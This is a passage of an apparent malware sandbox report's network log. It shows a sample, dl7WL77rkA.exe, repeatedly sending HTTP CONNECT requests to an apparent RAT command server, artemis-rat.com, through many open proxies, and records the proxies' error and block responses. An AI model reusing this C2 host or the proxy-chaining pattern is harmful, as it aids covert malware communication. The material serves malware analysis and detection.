                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Proxy Error</title></head><body><h1>Proxy Error</h1><p>You don't have permission to access this resource.The proxy server could not handle the request<p>Reason: <strong>Connect to remote machine blocked</strong></p></p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1732192.168.2.55484374.48.7.43803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.841114998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.012542009 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.25.3
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.3</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1733192.168.2.55471251.210.223.930003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.841118097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1734192.168.2.55404037.187.91.192219813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.842807055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1735192.168.2.55473988.99.138.2169693876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.844058990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1736192.168.2.55468545.11.95.16552123876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.844733000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1737192.168.2.554721185.49.31.20780813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.888959885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1738192.168.2.550706138.197.102.119803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.892050982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.041127920 CET806INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:49 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.18 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1739192.168.2.554046193.239.58.9280813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.892072916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1740192.168.2.554056146.59.70.29376653876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.894027948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.902414083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.014625072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.014584064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1741192.168.2.554906104.19.138.4803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.895319939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.049719095 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1742192.168.2.55481346.17.63.166188883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.896142006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.250134945 CET339INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid/4.7
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 5
                                                                                                                                                                                                                                                            X-Squid-Error: TCP_RESET 0
                                                                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            X-Cache: MISS from proxy.wakoopa.com
                                                                                                                                                                                                                                                            Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 72 65 73 65 74
                                                                                                                                                                                                                                                            Data Ascii: reset


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1743192.168.2.554796165.225.24.50100073876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.897490978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.202769995 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Server: Zscaler/6.2
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                            Content-length: 13607
                                                                                                                                                                                                                                                            Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 61 6c 65 72 74 68 72 65 65 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d 67 20 7b 0a 6d 61 78 2d 68 65 69 67 68 74 3a 37 35 70 78 3b 0a 6d 61 78 2d 77 69 64 74 68 3a 34 33 30 70 78 3b 0a 7d 0a 2e 70 67 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 0a 74 6f 70 3a 30 3b 0a 62 6f 74 74 6f 6d 3a 30 3b 0a 6c 65 66 74 3a 30 3b 0a 72 69 67 68 74 3a 30 3b 0a 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 3b 0a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 0a 7d 0a 2e 70 67 3a 62 65 66 6f 72 65 20 7b 0a 63 6f 6e 74 65 6e 74 3a 22 22 3b 0a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a
                                                                                                                                                                                                                                                            Data Ascii: ...# Id: closedproxy.html 285144 2021-06-16 05:02:06Z szhang --><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"><html><head><meta name="description" content="Zscaler makes the internet safe for businesses by protecting their employees from malware, viruses, and other security threats."><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Internet Security by Zscaler</title><script language="JavaScript">var defLang = 'en_US'</script>...<img alt="Zscaler" src="https://login.zscalerthree.net/img_logo_new1.png">--><style type="text/css">body {background-color:#e3e3e3;font-family:Arial, sans-serif;font-size:12px;color:#4B4F54;}a {cursor:pointer;text-decoration:none;color:#009dd0;}table {margin-top:10px;}td table {margin-top:0;text-align:center;}img {max-height:75px;max-width:430px;}.pg {position:absolute;top:0;bottom:0;left:0;right:0;overflow-x:hidden;white-space:nowrap;}.pg:before {content:"";display:inline-block;


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1744192.168.2.554830194.4.50.127123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.897835016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1745192.168.2.55474746.47.197.21031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.898251057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.893800974 CET536INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 3699
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            X-Cache: MISS from host
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from host:3128
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e d0 9e d0 a8 d0 98 d0 91 d0 9a d0 90 3a 20 d0 97 d0 b0 d0 bf d1 80 d0 be d1 88 d0 b5 d0 bd d0 bd d1 8b d0 b9 20 55 52 4c 20 d0 bd d0 b5 20 d0 bc d0 be d0 b6 d0 b5 d1 82 20 d0 b1 d1 8b d1 82 d1 8c 20 d0
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>: URL


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1746192.168.2.5548513.12.144.14631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.901570082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.122711897 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1747192.168.2.554758222.179.155.9090913876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.902647018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
